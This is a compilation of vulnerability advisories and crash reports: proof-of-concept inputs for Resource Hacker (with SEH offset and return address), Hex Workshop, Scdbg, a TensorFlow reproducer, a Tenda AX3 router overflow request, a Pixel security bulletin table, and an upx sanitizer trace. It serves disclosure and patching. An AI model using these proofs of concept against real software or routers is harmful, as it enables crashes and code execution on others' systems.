Resource Hacker version 3.6.0.92 suffers from a buffer overflow vulnerability.

    # Exploit Title: Resource Hacker 3.6.0.92 - Buffer overflow# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-06# Vendor Homepage: http://www.angusj.com/resourcehacker/# Software Link : http://www.angusj.com/resourcehacker/# Tested Version: 3.6.0.92# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Heap-based buffer overflow controlling the Structured Exception Handler(SEH) records in Reseource Hacker v3.6.0.92, and possibly other versions,may allow attackers to execute arbitrary code via a long file name argument.Proof of concept:Open ResHacker.exe from command line with a large string in Arguments, morethan 268 chars:File 'C:\ResourceHacker36\ResHacker.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac...'SEH chain of main threadAddress    SE handler0018FCB4   316A41306A413969   *** CORRUPT ENTRY ***0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0018fcb4 overwritten withnormal pattern : 0x6a413969 (offset 268), followed by 12 bytes of cyclicdata after the handler0BADF00D   ------------------------------'Targets'        =>[[ '<fill in the OS/app version here>',{                                       'Ret'         =>    0x00426446, #pop eax # pop ebx # ret    - ResHacker.exe (change this value from Mona,with a not \x00 ret address)                                       'Offset'    =>    268}],],

Resource Hacker 3.6.0.92 Buffer Overflow

Hex Workshop version 6.7 is vulnerable to denial of service via command line file arguments and control of the Structured Exception Handler (SEH) records.

    # Exploit Title: Hex Workshop v6.7 - Buffer overflow DoS# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-06# Vendor Homepage: http://www.bpsoft.com, http://www.hexworkshop.com# Software Link : http://www.bpsoft.com, http://www.hexworkshop.com# Tested Version: v6.7# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Hex Workshop v6.7 is vulnerable to denial of service via a command linefile arguments and control the Structured Exception Handler (SEH) records.Proof of concept:Open HWorks32.exe from command line with a large string in Arguments, morethan 268 chars:File 'C:\Hex Workshop\HWorks32.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag..."0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0089e63c overwritten withunicode pattern : 0x00390069 (offset 268), followed by 0 bytes of cyclicdata after the handlerThe application crash.

Hex Workshop 6.7 Buffer Overflow / Denial Of Service

Scdbg version 1.0 suffers from a buffer overflow vulnerability that can cause a denial of service condition.

    # Exploit Title: Scdbg 1.0 - Buffer overflow DoS# Discovery by: Rafael Pedrero# Discovery Date: 2021-06-13# Vendor Homepage:  http://sandsprite.com/blogs/index.php?uid=7&pid=152# Software Link : https://github.com/dzzie/VS_LIBEMU# Tested Version: 1.0 - Compile date: Jun  3 2021 20:57:45# Tested on:  Windows 7, 10CVSS v3: 7.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:HCWE: CWE-400Vulnerability description: scdbg.exe (all versions) is affected by a Denialof Service vulnerability that occurs when you use the /foff parameter ornot with a specific shellcode causing it to shutdown. Any malware could usethis option to evade the scan.Proof of concept:Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -fscdbg_crash.bin / scdbg.exe -f scdbg_crash.bin#!/usr/bin/env pythoncrash = "\x90\xF6\x84\x01\x90\x90\x90\x90"f = open ("scdbg_crash.bin", "w")f.write(crash)f.close()You can use gui_launcher.exe and check "Start offset 0x": 1 or directlywithout check[image: image.png]

Scdbg 1.0 Denial Of Service

A vulnerability was found in IObit Malware Fighter 9.4.0.776. It has been declared as critical. This vulnerability affects the function 0x8018E000/0x8018E004 in the library IMFCameraProtect.sys of the component IOCTL Handler. The manipulation leads to stack-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. VDB-224026 is the identifier assigned to this vulnerability.

CVE-2023-1646

TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, there is a heap buffer overflow in TAvgPoolGrad. A fix is included in TensorFlow 2.12.0 and 2.11.1.

**Package**

pip tensorflow, tensorflow-cpu (pip)

**Affected versions**

< 2.12.0

**Patched versions**

2.11.1, 2.12.0

**Impact**

import os
os.environ\['TF\_ENABLE\_ONEDNN\_OPTS'\] \= '0'
import tensorflow as tf
print(tf.\_\_version\_\_)
with tf.device("CPU"):
    ksize \= \[1, 40, 128, 1\]
    strides \= \[1, 128, 128, 30\]
    padding \= "SAME"
    data\_format \= "NHWC"
    orig\_input\_shape \= \[11, 9, 78, 9\]
    grad \= tf.saturate\_cast(tf.random.uniform(\[16, 16, 16, 16\], minval\=\-128, maxval\=129, dtype\=tf.int64), dtype\=tf.float32)
    res \= tf.raw\_ops.AvgPoolGrad(
        ksize\=ksize,
        strides\=strides,
        padding\=padding,
        data\_format\=data\_format,
        orig\_input\_shape\=orig\_input\_shape,
        grad\=grad,
    )

**Patches**

We have patched the issue in GitHub commit ddaac2bdd099bec5d7923dea45276a7558217e5b.

The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1

**For more information**

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

**Attribution**

This vulnerability has been reported by evn@google.com

CVE-2023-25664: Heap-buffer-overflow in AvgPoolGrad

Tenda AX3 V16.03.12.11 is vulnerable to Buffer Overflow via /goform/SetFirewallCfg.

Permalink

**Tenda AX3 V16.03.12.11 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
*   Firmware download address ：https://www.tenda.com.cn/download/detail-3476.html

**Affected version**

**Vulnerability details**

In /goform/SetFirewallCfg, The user can input firewallEn data into var. When the data entered by the user is greater than 3, the user input data will be strcpyed into the variable firewall\_buf. It is worth noting that there is no size detection, resulting in stack overflow.

**Poc**

import requests

url \= "http://192.168.0.1/goform/SetFirewallCfg"

firewallEn \= "a" \* 0x20000

r \= requests.post(url, data\={'firewallEn': firewallEn})
print(r.content)

Then you can see the router crash, and finally you can write exp to get rootshell

CVE-2023-27042: vuln/readme.md at main · hujianjie123/vuln

In rtt_unpack_xtlv_cbfn of dhd_rtt.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-254839721References: N/A

_Published March 6, 2023 | Updated March 20, 2023_

The Pixel Update Bulletin contains details of security vulnerabilities and functional improvements affecting supported Pixel devices (Google devices). For Google devices, security patch levels of 2023-03-01 or later address all issues in this bulletin and all issues in the March 2023 Android Security Bulletin. To learn how to check a device's security patch level, see Check and update your Android version.

All supported Google devices will receive an update to the 2023-03-01 patch level. We encourage all customers to accept these updates to their devices.

**Announcements**

*   In addition to the security vulnerabilities described in the March 2023 Android Security Bulletin, Google devices also contain patches for the security vulnerabilities described below.

**Security patches**

Vulnerabilities are grouped under the component that they affect. There is a description of the issue and a table with the CVE, associated references, type of vulnerability, severity, and updated Android Open Source Project (AOSP) versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Framework**

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-21000

A-194783918

RCE

Moderate

13

CVE-2022-20532

A-232242894

EoP

Moderate

13

CVE-2022-20542

A-238083570

EoP

Moderate

13

CVE-2023-20971

A-225880325

EoP

Moderate

13

CVE-2023-21017

A-236687884

EoP

Moderate

13

CVE-2023-21028

A-180680572

ID

Moderate

13

CVE-2023-21029

A-217934898

ID

Moderate

13

CVE-2023-21031

A-242688355

ID

Moderate

13

CVE-2023-20996

A-246749764

DoS

Moderate

13

CVE-2023-20997

A-246749702

DoS

Moderate

13

CVE-2023-20998

A-246749936

DoS

Moderate

13

CVE-2023-20999

A-246750467

DoS

Moderate

13

CVE-2023-21026

A-254681548

DoS

Moderate

13

**System**

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-20975

A-250573776

EoP

Moderate

13

CVE-2023-20976

A-216117246

EoP

Moderate

13

CVE-2023-20985

A-245915315

EoP

Moderate

13

CVE-2023-20994

A-259062118

EoP

Moderate

13

CVE-2023-20995

A-241910279

EoP

Moderate

13

CVE-2023-21001

A-237672190

EoP

Moderate

13

CVE-2023-21002

A-261193935

EoP

Moderate

13

CVE-2023-21003

A-261193711

EoP

Moderate

13

CVE-2023-21004

A-261193664

EoP

Moderate

13

CVE-2023-21005

A-261193946

EoP

Moderate

13

CVE-2023-21015

A-244569778

EoP

Moderate

13

CVE-2023-21018

A-233338564

EoP

Moderate

13

CVE-2023-21020

A-256591441

EoP

Moderate

13

CVE-2023-21021

A-255537598

EoP

Moderate

13

CVE-2023-21022

A-236098131

EoP

Moderate

13

CVE-2023-21024

A-246543238

EoP

Moderate

13

CVE-2023-21030

A-226234140

EoP

Moderate

13

CVE-2023-21034

A-230358834

EoP

Moderate

13

CVE-2023-21035

A-184847040

EoP

Moderate

13

CVE-2022-40303

A-260709824

ID

Moderate

13

CVE-2023-20968

A-262235935

ID

Moderate

13

CVE-2023-20969

A-262236313

ID

Moderate

13

CVE-2023-20970

A-262236005

ID

Moderate

13

CVE-2023-20972

A-255304665

ID

Moderate

13

CVE-2023-20973

A-260568245

ID

Moderate

13

CVE-2023-20974

A-260078907 \[2\]

ID

Moderate

13

CVE-2023-20977

A-254445952

ID

Moderate

13

CVE-2023-20979

A-259939364

ID

Moderate

13

CVE-2023-20980

A-260230274

ID

Moderate

13

CVE-2023-20981

A-256165737

ID

Moderate

13

CVE-2023-20982

A-260568083

ID

Moderate

13

CVE-2023-20983

A-260569449

ID

Moderate

13

CVE-2023-20984

A-242993878

ID

Moderate

13

CVE-2023-20986

A-255304475 \[2\] \[3\]

ID

Moderate

13

CVE-2023-20987

A-260569414

ID

Moderate

13

CVE-2023-20988

A-260569232

ID

Moderate

13

CVE-2023-20989

A-260568367

ID

Moderate

13

CVE-2023-20990

A-260568354

ID

Moderate

13

CVE-2023-20991

A-255305114

ID

Moderate

13

CVE-2023-20992

A-260568750

ID

Moderate

13

CVE-2023-21006

A-257030027

ID

Moderate

13

CVE-2023-21007

A-257029965

ID

Moderate

13

CVE-2023-21008

A-257030100

ID

Moderate

13

CVE-2023-21009

A-257029925

ID

Moderate

13

CVE-2023-21010

A-257029915

ID

Moderate

13

CVE-2023-21011

A-257029912

ID

Moderate

13

CVE-2023-21012

A-257029812

ID

Moderate

13

CVE-2023-21013

A-256818945

ID

Moderate

13

CVE-2023-21014

A-257029326

ID

Moderate

13

CVE-2023-21019

A-242379731

ID

Moderate

13

CVE-2023-21025

A-254929746

ID

Moderate

13

CVE-2023-21027

A-216854451

ID

Moderate

13

CVE-2023-21032

A-248085351

ID

Moderate

13

CVE-2023-21016

A-213905884

DoS

Moderate

13

CVE-2023-21033

A-244713323

DoS

Moderate

13

**Pixel**

    

CVE

References

Type

Severity

Subcomponent

CVE-2022-42498

A-240662453 \*

RCE

Critical

Cellular firmware

CVE-2022-42499

A-242001391 \*

RCE

Critical

modem

CVE-2023-21057

A-244450646 \*

RCE

Critical

Cellular firmware

CVE-2023-21058

A-246169606 \*

RCE

Critical

Cellular firmware

CVE-2023-24033

A-265822830 \*

RCE

Critical

Modem

CVE-2023-26496

A-274465028 \*

RCE

Critical

Modem

CVE-2023-26497

A-274464337 \*

RCE

Critical

Modem

CVE-2023-26498

A-274463883 \*

RCE

Critical

Modem

CVE-2023-21041

A-250123688 \*

EoP

Critical

GSC

CVE-2022-42528

A-242203672 \*

ID

Critical

TF-A

CVE-2023-21054

A-244556535 \*

RCE

High

Modem

CVE-2023-21040

A-238420277 \*

EoP

High

Bluetooth

CVE-2023-21065

A-239630493 \*

EoP

High

libfdt

CVE-2023-21036

A-264261868 \*

ID

High

Markup

CVE-2023-21067

A-254114726 \*

ID

High

GPS

CVE-2022-42500

A-239701389 \*

EoP

Moderate

Telephony

CVE-2023-21038

A-224000736 \*

EoP

Moderate

Cs40l25 haptic driver

CVE-2023-21042

A-239873326 \*

EoP

Moderate

LWIS

CVE-2023-21043

A-239872581 \*

EoP

Moderate

LWIS

CVE-2023-21050

A-244423702 \*

EoP

Moderate

libexynosdisplay

CVE-2023-21051

A-259323322 \*

EoP

Moderate

exynos

CVE-2023-21052

A-259063189 \*

EoP

Moderate

libril\_sitril

CVE-2023-21055

A-244301523 \*

EoP

Moderate

cpif

CVE-2023-21056

A-245300559 \*

EoP

Moderate

lwis

CVE-2023-21062

A-243376770 \*

EoP

Moderate

rild\_exynos

CVE-2023-21063

A-243129862 \*

EoP

Moderate

rild\_exynos

CVE-2023-21064

A-243130078 \*

EoP

Moderate

rild\_exynos

CVE-2023-21068

A-243433344 \*

EoP

Moderate

Fastboot startup screen

CVE-2023-21069

A-254029309 \*

EoP

Moderate

bcm4389 driver

CVE-2023-21070

A-254028776 \*

EoP

Moderate

bcm4389 driver

CVE-2023-21071

A-254028518 \*

EoP

Moderate

bcm4389 driver

CVE-2023-21072

A-257290781 \*

EoP

Moderate

bcm4389 driver

CVE-2023-21073

A-257290396 \*

EoP

Moderate

bcm4389 driver

CVE-2023-21075

A-261857862 \*

EoP

Moderate

bcmdhd driver

CVE-2023-21076

A-261857623 \*

EoP

Moderate

bcmdhd driver

CVE-2023-21077

A-257289560 \*

EoP

Moderate

bcm4389 driver

CVE-2023-21078

A-254840211 \*

EoP

Moderate

bcm4389 driver

CVE-2023-21079

A-254839721 \*

EoP

Moderate

bcm4389

CVE-2023-21039

A-263783650 \*

ID

Moderate

dumpstate

CVE-2023-21044

A-253425086 \*

ID

Moderate

libvendorgraphicbuffer

CVE-2023-21045

A-259323725 \*

ID

Moderate

CPIF

CVE-2023-21046

A-253424924 \*

ID

Moderate

Camera HAL

CVE-2023-21047

A-256166866 \*

ID

Moderate

Camera HAL

CVE-2023-21048

A-259304053 \*

ID

Moderate

WiFi

CVE-2023-21049

A-236688120 \*

ID

Moderate

Camera

CVE-2023-21053

A-251805610 \*

ID

Moderate

SMS

CVE-2023-21059

A-247564044 \*

ID

Moderate

Cellular firmware

CVE-2023-21060

A-253770924 \*

ID

Moderate

SMS

CVE-2023-21061

A-229255400 \*

DoS

Moderate

Wifi

**Qualcomm components**

    

CVE

References

Severity

Subcomponent

CVE-2022-25712  

A-235113793  
QC-CR#3142221 \[2\]

Moderate

Camera

CVE-2022-33245  

A-245611633  
QC-CR#2580147

Moderate

WLAN

**Qualcomm closed-source components**

    

CVE

References

Severity

Subcomponent

CVE-2022-33260  

A-245612876 \*

Moderate

Closed-source component

CVE-2022-40518  

A-261492744 \*

Moderate

Closed-source component

CVE-2022-40519  

A-261492623 \*

Moderate

Closed-source component

**Functional patches**

For details on the new bug fixes and functional patches included in this release, refer to the Pixel Community forum.

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

Security patch levels of 2023-03-01 or later address all issues associated with the 2023-03-01 security patch level and all previous patch levels. To learn how to check a device's security patch level, read the instructions on the Google device update schedule.

**2\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**3\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**4\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the Android bug ID in the _References_ column. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**5\. Why are security vulnerabilities split between this bulletin and the Android Security Bulletins?**

Security vulnerabilities that are documented in the Android Security Bulletins are required to declare the latest security patch level on Android devices. Additional security vulnerabilities, such as those documented in this bulletin are not required for declaring a security patch level.

**Versions**

  

Version

Date

Notes

1.0

March 6, 2023

Bulletin Published

1.1

March 20, 2023

Updated Issue List

CVE-2023-21079: Pixel Update Bulletin—March 2023

A heap-based buffer overflow was discovered in upx, during the generic pointer 'p' points to an inaccessible address in func get_le32(). The problem is essentially caused in PackLinuxElf32::elf_lookup() at p_lx_elf.cpp:5382.

**What's the problem (or question)?**

Multi heap-based buffer overflows were discovered in upx, during the genric pointer 'p' points to an inaccessible address in func get\_le32(). The issue can be triggered by different places, which can cause a denial of service. The issue is diff from issue365

ASAN reports:

\==112024==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00001f3b1 at pc 0x0000005292cb bp 0x7fffc3995640 sp 0x7fffc3995630
READ of size 4 at 0x61d00001f3b1 thread T0
    #0 0x5292ca in get\_le32(void const\*) /home/test/Desktop/EVAULATION/upx/src/bele.h:164
    #1 0x5292ca in N\_BELE\_RTP::LEPolicy::get32(void const\*) const /home/test/Desktop/EVAULATION/upx/src/bele\_policy.h:192
    #2 0x4589c1 in Packer::get\_te32(void const\*) const /home/test/Desktop/EVAULATION/upx/src/packer.h:296
    #3 0x4589c1 in PackLinuxElf32::elf\_lookup(char const\*) const /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:5382
    #4 0x463d30 in PackLinuxElf32::PackLinuxElf32help1(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:315
    #5 0x464e96 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.h:395
    #6 0x464e96 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:4800
    #7 0x464e96 in PackBSDElf32x86::PackBSDElf32x86(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:4817
    #8 0x464e96 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:4828
    #9 0x4f337a in PackMaster::visitAllPackers(Packer\* (\*)(Packer\*, void\*), InputFile\*, options\_t const\*, void\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:190
    #10 0x4f50f9 in PackMaster::getUnpacker(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248
    #11 0x4f521f in PackMaster::unpack(OutputFile\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266
    #12 0x52a1e6 in do\_one\_file(char const\*, char\*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160
    #13 0x52a69e in do\_files(int, int, char\*\*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271
    #14 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538
    #15 0x7efc08e6182f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)
    #16 0x404828 in \_start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828)

0x61d00001f3b1 is located 189 bytes to the right of 2164-byte region \[0x61d00001ea80,0x61d00001f2f4)
allocated by thread T0 here:
    #0 0x7efc09a55602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x42732a in MemBuffer::alloc(unsigned long long) /home/test/Desktop/EVAULATION/upx/src/mem.cpp:194

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/test/Desktop/EVAULATION/upx/src/bele.h:164 get\_le32(void const\*)
Shadow bytes around the buggy address:
  0x0c3a7fffbe20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbe30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbe40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbe50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 fa
  0x0c3a7fffbe60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0c3a7fffbe70: fa fa fa fa fa fa\[fa\]fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbe80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbe90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbeb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
\==112024\==ABORTING

Debug

Program received signal SIGSEGV, Segmentation fault.
0x000000000066f8f8 in get\_le32 (p=0xa1fffd) at bele.h:164
164        return ACC\_UA\_GET\_LE32(p);
\[ Legend: Modified register | Code | Heap | Stack | String \]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0               
$rbx   : 0xa7ce93          
$rcx   : 0x2               
$rdx   : 0xae              
$rsp   : 0x00007fffffffcc18  →  0x000000000051249b  →  <PackLinuxElf32::elf\_lookup(char+0> xor eax, ebp
$rbp   : 0x8e8223e2        
$rsi   : 0x0000000000a1fffd  →  0x0000000000a1fffd
$rdi   : 0x00000000009ed3c0  →  0x00000000007cd9c0  →  0x000000000066fe00  →  <N\_BELE\_RTP::LEPolicy::~LEPolicy()+0> lea rsp, \[rsp-0x98\]
$rip   : 0x000000000066f8f8  →  <N\_BELE\_RTP::LEPolicy::get32(void+0> mov eax, DWORD PTR \[rsi\]
$r8    : 0x1f              
$r9    : 0x3fdf            
$r10   : 0xae              
$r11   : 0x1d9577c0        
$r12   : 0x0000000000a00030  →  0x00000000007267a0  →  <vtable+0> add BYTE PTR \[rax\], al
$r13   : 0x0000000000a1fffd  →  0x0000000000a1fffd
$r14   : 0x0000000000a00a51  →  0x0000000000000000
$r15   : 0x00000000007cd9c0  →  0x000000000066fe00  →  <N\_BELE\_RTP::LEPolicy::~LEPolicy()+0> lea rsp, \[rsp-0x98\]
$eflags: \[carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification\]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffcc18│+0x0000: 0x000000000051249b  →  <PackLinuxElf32::elf\_lookup(char+0> xor eax, ebp     ← $rsp
0x00007fffffffcc20│+0x0008: 0x00000000006cdffe  →  "JNI\_OnLoad"
0x00007fffffffcc28│+0x0010: 0x0000000200000000
0x00007fffffffcc30│+0x0018: 0x000000000900457f
0x00007fffffffcc38│+0x0020: 0x0000000000000068 ("h"?)
0x00007fffffffcc40│+0x0028: 0x0000000000000000
0x00007fffffffcc48│+0x0030: 0x0000000000070000
0x00007fffffffcc50│+0x0038: 0x0000000000000000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x66f8e7 <N\_BELE\_RTP::LEPolicy::get32(void+0> mov    rcx, QWORD PTR \[rsp+0x8\]
     0x66f8ec <N\_BELE\_RTP::LEPolicy::get32(void+0> mov    rdx, QWORD PTR \[rsp\]
     0x66f8f0 <N\_BELE\_RTP::LEPolicy::get32(void+0> lea    rsp, \[rsp+0x98\]
 →   0x66f8f8 <N\_BELE\_RTP::LEPolicy::get32(void+0> mov    eax, DWORD PTR \[rsi\]
     0x66f8fa <N\_BELE\_RTP::LEPolicy::get32(void+0> ret    
     0x66f8fb                  nop    DWORD PTR \[rax+rax\*1+0x0\]
     0x66f900 <N\_BELE\_RTP::LEPolicy::get64(void+0> lea    rsp, \[rsp-0x98\]
     0x66f908 <N\_BELE\_RTP::LEPolicy::get64(void+0> mov    QWORD PTR \[rsp\], rdx
     0x66f90c <N\_BELE\_RTP::LEPolicy::get64(void+0> mov    QWORD PTR \[rsp+0x8\], rcx
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:bele.h+164 ────
    159     }
    160     
    161     inline unsigned get\_le32(const void \*p)
    162     {
    163     #if defined(ACC\_UA\_GET\_LE32)
 →  164         return ACC\_UA\_GET\_LE32(p);
    165     #else
    166         return acc\_ua\_get\_le32(p);
    167     #endif
    168     }
    169     
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
\[#0\] Id 1, Name: "upx.out", stopped, reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
\[#0\] 0x66f8f8 → get\_le32(p=0xa1fffd)
\[#1\] 0x66f8f8 → N\_BELE\_RTP::LEPolicy::get32(this=0x9ed3c0 <N\_BELE\_RTP::le\_policy>, p=0xa1fffd)
\[#2\] 0x51249b → Packer::get\_te32(this=0xa00030, p=0xa1fffd)
\[#3\] 0x51249b → PackLinuxElf32::elf\_lookup(this=0xa00030, name=0x6cdffe "JNI\_OnLoad")
\[#4\] 0x529509 → PackLinuxElf32::PackLinuxElf32help1(this=0xa00030, f=0x7fffffffce10)
\[#5\] 0x52c65e → PackLinuxElf32Le::PackLinuxElf32Le(f=0x7fffffffce10, this=0xa00030)
\[#6\] 0x52c65e → PackLinuxElf32x86::PackLinuxElf32x86(f=0x7fffffffce10, this=0xa00030)
\[#7\] 0x52c65e → PackBSDElf32x86::PackBSDElf32x86(f=0x7fffffffce10, this=0xa00030)
\[#8\] 0x52c65e → PackFreeBSDElf32x86::PackFreeBSDElf32x86(this=0xa00030, f=0x7fffffffce10)
\[#9\] 0x60448c → PackMaster::visitAllPackers(func=0x602c30 <try\_unpack(Packer\*, void\*)>, f=0x7fffffffce10, o=0x7fffffffcfc8, user=0x7fffffffce10)
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤  bt
#0  0x000000000066f8f8 in get\_le32 (p=0xa1fffd) at bele.h:164
#1  N\_BELE\_RTP::LEPolicy::get32 (this=0x9ed3c0 <N\_BELE\_RTP::le\_policy>, p=0xa1fffd) at bele\_policy.h:192
#2  0x000000000051249b in Packer::get\_te32 (this=0xa00030, p=0xa1fffd) at packer.h:296
#3  PackLinuxElf32::elf\_lookup (this=0xa00030, name=0x6cdffe "JNI\_OnLoad") at p\_lx\_elf.cpp:5382
#4  0x0000000000529509 in PackLinuxElf32::PackLinuxElf32help1 (this=this@entry=0xa00030, f=f@entry=0x7fffffffce10) at p\_lx\_elf.cpp:315
#5  0x000000000052c65e in PackLinuxElf32Le::PackLinuxElf32Le (f=0x7fffffffce10, this=0xa00030) at p\_lx\_elf.h:395
#6  PackLinuxElf32x86::PackLinuxElf32x86 (f=0x7fffffffce10, this=0xa00030) at p\_lx\_elf.cpp:4800
#7  PackBSDElf32x86::PackBSDElf32x86 (f=0x7fffffffce10, this=0xa00030) at p\_lx\_elf.cpp:4817
#8  PackFreeBSDElf32x86::PackFreeBSDElf32x86 (this=0xa00030, f=0x7fffffffce10) at p\_lx\_elf.cpp:4828
#9  0x000000000060448c in PackMaster::visitAllPackers (func=0x602c30 <try\_unpack(Packer\*, void\*)>, f=0x7fffffffce10, o=0x7fffffffcfc8, user=0x7fffffffce10) at packmast.cpp:190
#10 0x00000000006072ca in PackMaster::getUnpacker (f=<optimized out>) at packmast.cpp:248
#11 PackMaster::unpack (this=0x7fffffffcfb0, fo=0x7fffffffcee0) at packmast.cpp:266
#12 0x0000000000670dc5 in do\_one\_file (iname=iname@entry=0x7fffffffdf15 "id:000089,sig:11,src:001286,op:MOpt-core-havoc,rep:2", oname=oname@entry=0x7fffffffd550 "/dev/null") at work.cpp:160
#13 0x000000000067157c in do\_files (i=i@entry=0x4, argc=0x5, argv=0x7fffffffdac8) at work.cpp:271
#14 0x00000000004056a1 in main (argc=0x5, argv=0x7fffffffdac8) at main.cpp:1538

Deferencing a generic poniter 'p' trigger the overflow.

gef➤  p \*p
Attempt to dereference a generic pointer.
gef➤  p p
$1 = (const void \*) 0xa1fffd

Essentially, the problem is caused in PackLinuxElf32::elf\_lookup() at p\_lx\_elf.cpp:5382

do if (0\==((h ^ get\_te32(hp))>>1)) {
    unsigned st\_name = get\_te32(&dsp->st\_name);
    char const \*const p = get\_str\_name(st\_name, (unsigned)-1);
    if (0\==strcmp(name, p)) {
        return dsp;
    }
} while (++dsp, 0\==(1u& get\_te32(hp++)));

Several locations will also trigger vulnerabilities:  
PackLinuxElf32::elf\_lookup() at p\_lx\_elf.cpp:5368

unsigned const w = get\_te32(&bitmask\[(n\_bitmask -1) & (h>>5)\]);

PackLinuxElf64::elf\_lookup() at p\_lx\_elf.cpp:5404

